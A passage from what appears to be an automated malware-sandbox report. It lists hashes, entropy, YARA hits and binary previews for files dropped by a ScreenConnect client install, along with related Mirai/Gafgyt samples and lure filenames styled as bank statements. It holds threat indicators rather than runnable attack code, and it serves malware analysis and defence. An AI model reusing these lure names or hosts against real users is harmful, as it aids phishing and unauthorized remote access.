                                       | bin.i686.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                       • 85.239.34.134
                                       | bin.x86_64.elf | Get hash | malicious | Gafgyt, Mirai | Browse
                                       • 85.239.34.134
                                       | bin.armv7l.elf | Get hash | malicious | Mirai | Browse
                                       • 85.239.34.134
                                       | bin.x86_64.elf | Get hash | malicious | Unknown | Browse
                                       • 85.239.34.134
                                       No context
                                       Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                       C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | monthly-eStatementForum120478962.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | monthly-eStatementForum120478962.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | pzPO97QouM.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | pzPO97QouM.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | statments.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | Scanned01Document_ms.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | Scanned01Document_ms.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | sstatment.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | extukGiBrn.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                       | Vh0tTzx4Ko.exe | Get hash | malicious | ScreenConnect Tool | Browse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):219478
                                                              Entropy (8bit):6.580652646214445
                                                              Encrypted:false
                                                              SSDEEP:3072:tZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:tZuH2aCGw1ST1wQLdqv4
                                                              MD5:17F1F1A5F0505B6DA42A60B8A657A8FF
                                                              SHA1:BAC8CC703D7B832AC44871758FF189908C0A1618
                                                              SHA-256:2FDBF0ACE805F7DF4A1B3DEDC158FB3370A31AA8F8514601E194244CAB9F4EBA
                                                              SHA-512:251E85FFA4F24972DD35DEAF8FF1499B9E108E3614007A4DE27FC6BAA51CC0F9FBCAD20750DBFC41CC0648EF14DB7886ACF0E98E2FA6D0C87C596982A15C58A9
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5c1176.rbs, Author: Joe Security
                                                              Reputation:low
                                                              Preview:...@IXOS.@.....@.|mY.@.....@.....@.....@.....@.....@......&.{64D6109D-BB46-4239-08D9-EC110E53E92E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):4.646296001566109
                                                              Encrypted:false
                                                              SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                              MD5:8B45555EF2300160892C25F453098AA4
                                                              SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                              SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                              SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):21018
                                                              Entropy (8bit):7.841465962209068
                                                              Encrypted:false
                                                              SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                              MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                              SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                              SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                              SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):50133
                                                              Entropy (8bit):4.759054454534641
                                                              Encrypted:false
                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):26722
                                                              Entropy (8bit):7.7401940386372345
                                                              Encrypted:false
                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):197120
                                                              Entropy (8bit):6.58476728626163
                                                              Encrypted:false
                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: statments.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: sstatment.exe, Detection: malicious, Browse
                                                              • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                              • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68096
                                                              Entropy (8bit):6.068776675019683
                                                              Encrypted:false
                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95520
                                                              Entropy (8bit):6.505346220942731
                                                              Encrypted:false
                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):260168
                                                              Entropy (8bit):6.416438906122177
                                                              Encrypted:false
                                                              SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                              MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                              SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                              SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                              SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):61216
                                                              Entropy (8bit):6.31175789874945
                                                              Encrypted:false
                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):601376
                                                              Entropy (8bit):6.185921191564225
                                                              Encrypted:false
                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:true
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):842248
                                                              Entropy (8bit):6.268561504485627
                                                              Encrypted:false
                                                              SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                              MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                              SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                              SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                              SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
